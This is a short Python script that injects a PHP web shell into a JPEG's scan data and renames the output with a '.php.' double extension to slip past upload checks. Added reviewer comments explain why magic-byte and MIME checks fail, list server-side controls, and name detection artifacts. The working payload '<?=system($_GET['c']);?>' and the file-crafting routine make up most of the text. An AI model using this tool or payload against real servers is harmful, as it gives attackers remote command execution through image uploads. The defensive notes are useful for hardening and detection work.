- #!/usr/bin/env python
- # a simple script to inject PHP code into JPG file
- # thanks to Damien Cauquil for insertPayload()
- # ref: https://virtualabs.fr/Nasty-bulletproof-Jpegs-l.html
- from sys import argv
- import struct
- # insertPayload(_in, _out, payload, off)
- #   _in     : whole content of the JPEG file, as one byte string
- #   _out    : writable file object that receives the modified copy
- #   payload : byte string written over existing image bytes
- #   off     : extra offset added to the computed write position
- # Returns True when the modified copy was written, False when the size
- # check fails (in that case nothing is written to _out).
- # The write is an overwrite, not an insertion: len(payload) bytes are replaced,
- # so the output has the same length as the input and every byte before the
- # overwritten span (including the start of the file) is unchanged.
- # NOTE(review, defensive): since the leading bytes are kept, upload checks
- # that only inspect magic bytes, MIME type or image dimensions should not be
- # expected to reject such a file. The title of the referenced write-up
- # suggests payloads meant to survive image processing, so re-encoding alone
- # is presumably not a sufficient control (confirm against the reference).
- # The reliable controls are on the serving side: uploads stored where no
- # script handler applies, server-generated names, allow-listed extension.
- def insertPayload(_in, _out, payload,off):
- img = _in
- # look for 'FF DA' (SOS)
- # str.index raises ValueError when the marker is absent; this is not caught
- sos = img.index("\xFF\xDA")
- # big-endian 16-bit length field stored right after the 2-byte marker
- sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
- # marker (2 bytes) + segment length: distance from sos to the scan data
- sod = sos_size+2
- # look for 'FF D9' (EOI)
- # the search runs on img[sod:], so eoi is an index relative to that slice
- eoi = img[sod:].index("\xFF\xD9")
- # enough size ?
- if (eoi - sod - off)>=len(payload):
- # keep img[:sod+sos+off], write payload, then resume the original bytes
- # len(payload) further on, so the total length stays the same
- _out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
- return True
- else:
- return False
- # Script body: read the file named by the first command-line argument and
- # write a modified copy next to it. A missing argument raises IndexError.
- filein = argv[1]
- # every "." in the argument becomes ".php.", e.g. "x.jpg" -> "x.php.jpg"
- # NOTE(review, defensive): a name like this runs as PHP only where the web
- # server maps the PHP handler to any ".php" component of a file name rather
- # than the final extension (e.g. Apache AddHandler-style mappings). Bind the
- # handler to names ending in ".php" only, and never keep client-supplied
- # file names for stored uploads.
- fileout = argv[1].replace(".",".php.")
- # PHP short echo tag that passes the "c" query parameter to system(),
- # i.e. a command-execution web shell if the file is ever interpreted as PHP
- # NOTE(review, detection): PHP opening tags ("<?") inside image uploads, and
- # requests with query strings to files under upload directories, are the
- # artifacts to alert on.
- payload = '<?=system($_GET[\'c\']);?>'
- with open(filein, "rb") as rd:
- data = rd.read()
- # the return value of insertPayload is ignored: when it returns False the
- # output file has already been created by open() and is left empty
- with open(fileout, "wb") as wr:
- insertPayload(data,wr,payload,4)